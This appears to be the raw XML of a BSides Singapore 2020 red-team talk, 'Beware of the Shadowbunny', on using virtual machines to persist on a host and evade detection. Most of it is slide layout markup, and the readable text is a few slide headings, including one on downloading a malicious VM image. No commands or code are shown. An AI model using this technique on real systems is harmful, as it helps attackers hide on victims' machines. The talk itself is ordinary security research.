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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="302" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="298" r:id="rId11"/>
    <p:sldId id="299" r:id="rId12"/>
    <p:sldId id="304" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="263" r:id="rId16"/>
    <p:sldId id="317" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="321" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="301" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="311" r:id="rId23"/>
    <p:sldId id="308" r:id="rId24"/>
    <p:sldId id="310" r:id="rId25"/>
    <p:sldId id="313" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="266" r:id="rId28"/>
    <p:sldId id="325" r:id="rId29"/>
    <p:sldId id="319" r:id="rId30"/>
    <p:sldId id="294" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
    <p:sldId id="312" r:id="rId34"/>
    <p:sldId id="316" r:id="rId35"/>
    <p:sldId id="315" r:id="rId36"/>
    <p:sldId id="269" r:id="rId37"/>
    <p:sldId id="281" r:id="rId38"/>
    <p:sldId id="320" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="326" r:id="rId41"/>
    <p:sldId id="296" r:id="rId42"/>
    <p:sldId id="282" r:id="rId43"/>
    <p:sldId id="318" r:id="rId44"/>
    <p:sldId id="280" r:id="rId45"/>
    <p:sldId id="323" r:id="rId46"/>
    <p:sldId id="297" r:id="rId47"/>
    <p:sldId id="327" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="272" r:id="rId50"/>
    <p:sldId id="273" r:id="rId51"/>
    <p:sldId id="322" r:id="rId52"/>
    <p:sldId id="290" r:id="rId53"/>
    <p:sldId id="28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BA8599-59AC-4487-95E3-F120EAF18ACC}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="283"/>
            <p14:sldId id="258"/>
            <p14:sldId id="287"/>
            <p14:sldId id="302"/>
            <p14:sldId id="259"/>
            <p14:sldId id="286"/>
            <p14:sldId id="261"/>
            <p14:sldId id="260"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="304"/>
            <p14:sldId id="300"/>
            <p14:sldId id="303"/>
            <p14:sldId id="263"/>
            <p14:sldId id="317"/>
            <p14:sldId id="305"/>
            <p14:sldId id="321"/>
            <p14:sldId id="274"/>
            <p14:sldId id="301"/>
            <p14:sldId id="293"/>
            <p14:sldId id="311"/>
            <p14:sldId id="308"/>
            <p14:sldId id="310"/>
            <p14:sldId id="313"/>
            <p14:sldId id="314"/>
            <p14:sldId id="266"/>
            <p14:sldId id="325"/>
            <p14:sldId id="319"/>
            <p14:sldId id="294"/>
            <p14:sldId id="309"/>
            <p14:sldId id="295"/>
            <p14:sldId id="312"/>
            <p14:sldId id="316"/>
            <p14:sldId id="315"/>
            <p14:sldId id="269"/>
            <p14:sldId id="281"/>
            <p14:sldId id="320"/>
            <p14:sldId id="288"/>
            <p14:sldId id="326"/>
            <p14:sldId id="296"/>
            <p14:sldId id="282"/>
            <p14:sldId id="318"/>
            <p14:sldId id="280"/>
            <p14:sldId id="323"/>
            <p14:sldId id="297"/>
            <p14:sldId id="327"/>
            <p14:sldId id="306"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Appendix" id="{7189CBF3-D683-4762-AC4F-F0E623D4A0BC}">
          <p14:sldIdLst>
            <p14:sldId id="322"/>
            <p14:sldId id="29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B42D5-660C-4FB5-BE54-CB2681D693D3}" v="454" dt="2020-09-21T07:19:19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1" autoAdjust="0"/>
    <p:restoredTop sz="67639" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="7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220AB-BC8E-421B-92C5-C7D4993CF2D5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315A3-29E3-4C1F-A82C-53AD71C15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3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0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02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52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41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0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2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3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20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93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41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4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70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00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6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80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96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7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08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9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15A3-29E3-4C1F-A82C-53AD71C15B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8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 baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr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PRESENTATION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TITLE </a:t>
            </a:r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Presentation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Tagline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386730-2EEB-4569-8643-CAF4F1ED60BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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rgbClr val="008ED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97FF84B-A62B-4EC1-97F2-2707B3068973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016291" y="3388459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rgbClr val="D30F6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Graphic 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89BBEDCD-86FD-492D-AA7F-0E14818F5A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786259" y="3114220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rgbClr val="008EDC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D30F64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37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7BEE7-E0BB-420F-BD07-04E32DF7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035D0-A799-45BA-9607-0F885850E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7430-E1ED-4FC1-B4DA-E46996D5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05C451-20BC-41BA-9B04-6E0755B28DB6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>23/9/2020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D64D2-EB63-4001-B83E-6BCBDB68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76DA9-A997-4797-AE47-CA5647DD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E3498-3C28-4892-84EA-26201D5F5390}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Graphic 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6568A172-2428-469D-885B-41F1CD4A250D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rgbClr val="008EDC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D30F64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E25583-7ABB-4B66-B353-A3A5162A3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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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9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9625" y="2277703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410" y="3361582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raphic 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DF0F94-BADE-4A15-B2B7-777D6626D075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873410" y="3071853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rgbClr val="008EDC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D30F64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E7B282-63A5-4441-BD22-F02ED6F21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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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81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9A25-AA40-4054-BEB0-75B594E7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Click to edit Master title style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F81CE-5ADE-48EE-9669-4C7373E80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8EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008ED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646B6-739D-46F6-9DC9-3648AC5C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8EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008ED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4F3BD-E42A-4849-BBC2-F5C72E9B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05C451-20BC-41BA-9B04-6E0755B28DB6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>23/9/2020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66911-D8E1-4FFD-9DD0-0E332D50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60F6A-4F9B-4E67-AA90-D8A791EA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E3498-3C28-4892-84EA-26201D5F5390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55D27-F8D8-4CCC-AD45-E43038DF8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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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35A8-F7D7-4570-AD1F-C8C4FEB2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2BE4D-4963-4A5B-AEE1-FBB5E4A76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8ED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617F9-07AC-4342-8649-03F023367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8EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008ED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3520F-5435-47F6-A1C1-E8FF2D324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8ED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0B79F-84B1-4821-A373-248457D44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8EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="008ED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48CAE-8C43-4CF5-958D-10057476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05C451-20BC-41BA-9B04-6E0755B28DB6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>23/9/2020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83F74-4A39-4586-82DD-834A53D4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4B688-C375-4DEF-8A73-EE71B31E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E3498-3C28-4892-84EA-26201D5F5390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E9705C-EEAD-4567-ABE1-78C89C623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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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AA40-C3F8-49A5-B58D-8FD6AA33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Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-S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D9B8F-DCD9-408C-A98D-5191D4B24A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05C451-20BC-41BA-9B04-6E0755B28DB6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>23/9/2020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56FAD-4FCF-4F7D-BAAC-ED354C7E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33773-8B6E-4C17-A88C-1BF0967D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E3498-3C28-4892-84EA-26201D5F5390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12433-3149-49E0-8DFC-8C96523BA4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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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BCCD90-E553-42DB-B540-A909B843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05C451-20BC-41BA-9B04-6E0755B28DB6}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>23/9/2020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93470-CABB-479C-98A6-17415472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6268F-33A4-4A29-8516-ACBC1395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E3498-3C28-4892-84EA-26201D5F5390}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›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BF8A9-DEF9-4741-B9C9-E9509F3F4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02" y="6287063"/>
            <a:ext cx="1664898" cy="5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D899AF-5726-4AC1-9A5D-0897449E8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20000"/>
          </a:blip>
          <a:srcRect r="52444" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="965"/>
            <a:ext cx="3816904" cy="214701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89F00-0DDD-4A96-953C-2847359E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Century Gothic"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Click to edit Master title style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4C78-F31C-4DED-B573-0D8D62B24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E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Fifth level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8E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3F275F-5FDA-4B8C-A889-4B6BFB0B46DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10506890" y="273202"/>
            <a:ext cx="1690559" cy="1354717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 231247 w 2178174"/>
              <a:gd name="connsiteY0" fmla="*/ 950428 h 1593786"/>
              <a:gd name="connsiteX1" fmla="*/ 45305 w 2178174"/>
              <a:gd name="connsiteY1" fmla="*/ 1404126 h 1593786"/>
              <a:gd name="connsiteX2" fmla="*/ 50617 w 2178174"/>
              <a:gd name="connsiteY2" fmla="*/ 1415814 h 1593786"/>
              <a:gd name="connsiteX3" fmla="*/ 529816 w 2178174"/>
              <a:gd name="connsiteY3" fmla="*/ 1547566 h 1593786"/>
              <a:gd name="connsiteX4" fmla="*/ 2173541 w 2178174"/>
              <a:gd name="connsiteY4" fmla="*/ 749611 h 1593786"/>
              <a:gd name="connsiteX5" fmla="*/ 2173541 w 2178174"/>
              <a:gd name="connsiteY5" fmla="*/ 7969 h 1593786"/>
              <a:gd name="connsiteX6" fmla="*/ 231247 w 2178174"/>
              <a:gd name="connsiteY6" fmla="*/ 950428 h 159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8174" h="1593786">
                <a:moveTo>
                  <a:pt x="231247" y="950428"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="231247" y="950428"/>
                  <a:pt x="-101324" y="1111932"/>
                  <a:pt x="45305" y="1404126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="50617" y="1415814"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="50617" y="1415814"/>
                  <a:pt x="197246" y="1708008"/>
                  <a:pt x="529816" y="1547566"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2173541" y="749611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2173541" y="7969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231247" y="950428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12EDB2-FA14-49A6-BE75-32BF802363B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62409" y="0"/>
            <a:ext cx="1127858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7C2B8A-C27E-4C4E-83F3-7D2798BB980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60518" y="950560"/>
            <a:ext cx="823031" cy="6279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FCAEEDC-DDBA-4C6C-96E6-31C45DE41349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-1" y="5900543"/>
            <a:ext cx="4382219" cy="948251"/>
            <a:chOff x="8074325" y="5909749"/>
            <a:chExt cx="4103405" cy="94825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EB50DE-F53B-446F-B16A-C1D93D25E471}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10206586" y="5909749"/>
              <a:ext cx="1971144" cy="389200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3150394 w 3152775"/>
                <a:gd name="connsiteY0" fmla="*/ 7144 h 752475"/>
                <a:gd name="connsiteX1" fmla="*/ 371952 w 3152775"/>
                <a:gd name="connsiteY1" fmla="*/ 7144 h 752475"/>
                <a:gd name="connsiteX2" fmla="*/ 7144 w 3152775"/>
                <a:gd name="connsiteY2" fmla="*/ 370999 h 752475"/>
                <a:gd name="connsiteX3" fmla="*/ 7144 w 3152775"/>
                <a:gd name="connsiteY3" fmla="*/ 384334 h 752475"/>
                <a:gd name="connsiteX4" fmla="*/ 371952 w 3152775"/>
                <a:gd name="connsiteY4" fmla="*/ 748189 h 752475"/>
                <a:gd name="connsiteX5" fmla="*/ 3150394 w 3152775"/>
                <a:gd name="connsiteY5" fmla="*/ 748189 h 752475"/>
                <a:gd name="connsiteX6" fmla="*/ 3150394 w 3152775"/>
                <a:gd name="connsiteY6" fmla="*/ 714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52775" h="752475">
                  <a:moveTo>
                    <a:pt x="3150394" y="7144"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="371952" y="7144"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="371952" y="7144"/>
                    <a:pt x="7144" y="7144"/>
                    <a:pt x="7144" y="370999"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7144" y="384334"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7144" y="384334"/>
                    <a:pt x="7144" y="748189"/>
                    <a:pt x="371952" y="748189"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3150394" y="748189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150394" y="7144"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1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4C6E5D-6558-4506-BB36-DEEA2D034E6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8074325" y="6344910"/>
              <a:ext cx="4103405" cy="513090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rgbClr val="D30F64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6456EF-29B4-409A-ADE2-9A1EE7AE4C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="167902" y="6383667"/>
            <a:ext cx="2676017" cy="400110"/>
            <a:chOff x="167902" y="6383667"/>
            <a:chExt cx="2676017" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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D3D8E44D-0F7C-412E-8761-F592B15BE8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02" y="6477306"/>
              <a:ext cx="229885" cy="229885"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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79EFDC14-EF13-4D20-9983-EC23BEA200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29" y="6481092"/>
              <a:ext cx="229861" cy="229885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A1901240-CF9C-4B65-AF43-E956425216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125" y="6477306"/>
              <a:ext cx="224670" cy="229885"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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49A2A2DB-9D5B-4433-8065-A7FD8C9B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797" y="6477305"/>
              <a:ext cx="229885" cy="22988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BE4125-2823-4BDB-B564-CE977F7B528C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1466303" y="6383667"/>
              <a:ext cx="1377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BSidesSG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DBFF2EC-9CE6-4A96-B8E5-616153F3A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20000"/>
          </a:blip>
          <a:srcRect r="52444" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8366645" y="4701782"/>
            <a:ext cx="3816904" cy="214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6A2EB58-AEA5-4EA1-83EE-79B68E222096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5935940"/>
            <a:ext cx="2039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latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BSides Singapore 2020</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175701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3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mbracethered.com/" TargetMode="Externa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24.sv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5.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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embracethered.com/" TargetMode="External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bracethered.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:johann@wunderwuzzi.net" TargetMode="External"/><Relationship Id="rId4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embracethered.com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F3DBAB-E3CB-45AA-A6C2-729053F2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88" y="994471"/>
            <a:ext cx="5690680" cy="1517356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latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Beware of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1"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latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Shadowbunny</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="60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B1FF277-E08E-4B5C-A895-59C22F665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008EDC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Johann Rehberger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008EDC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WUNDERWUZZI, LLC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008EDC"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008EDC"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008EDC"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008EDC"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG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F76F9E-CCB5-400E-8696-021A18D08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62" y="346648"/>
            <a:ext cx="3603733" cy="109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89008-35FD-41D5-9CAA-4BB9D81BCCD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7067" y="4667283"/>
            <a:ext cx="2450647" cy="21907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153E2A-B532-41E6-9880-77D35DEC971C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758588" y="4530777"/>
            <a:ext cx="3288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5"/>
              </a:rPr>
              <a:t>https://embracethered.com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45033-BB6E-49BC-8776-9A716135DE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758588" y="2561892"/>
            <a:ext cx="1052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Leveraging virtual machines to persist and evade detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="698906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0792-5AE9-4602-9308-4124D37E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Red Team Operations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Bitcoin">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB021302-88F3-4363-A44E-EF09A53BD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0325" y="2895601"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphic 3" descr="Infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D51CF4C-D5DA-49E3-B94B-C113EE130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2969" y="2895601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EAE87-F274-4DAC-98A9-4721E08C84C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2656935" y="4246080"/>
            <a:ext cx="300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Long-term persistence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D3019-36B7-4EA8-9920-2B78BE2CFDF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235012" y="4246080"/>
            <a:ext cx="330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Crypto-currency mining</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299832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6980-489E-4769-997D-A678440A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Insights Dashboard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09AB85-F847-452B-B4EB-D03E5A342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364"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2008166" y="1928156"/>
            <a:ext cx="8175667" cy="380029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FB9B51-4450-4054-8D8E-7FB2B2C6B3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="4195482"/>
            <a:ext cx="215153" cy="2107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61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3675E-C42A-4768-8924-CDE74768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7" y="2770632"/>
            <a:ext cx="4672584" cy="2101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Shadowbunny</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technique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3EC126D-B4A3-4FAB-A5C9-09667C54F51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21532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3C09-DB2B-4B44-9482-73EB3AB0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Shadowbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Devil face outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2002367-DA7D-4B69-824A-CB58AB651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982" y="3194167"/>
            <a:ext cx="774463" cy="77446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591D21-5C19-4D5A-B8EC-01172702C650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753725" y="4084765"/>
            <a:ext cx="11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8CD11-B738-48B4-A24D-86E139BA3467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977336" y="4084765"/>
            <a:ext cx="14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Install/Enable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtualization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30C2E-B5F3-4493-A6D8-A91352BFCAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920792" y="4041482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Download Malicious VM Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
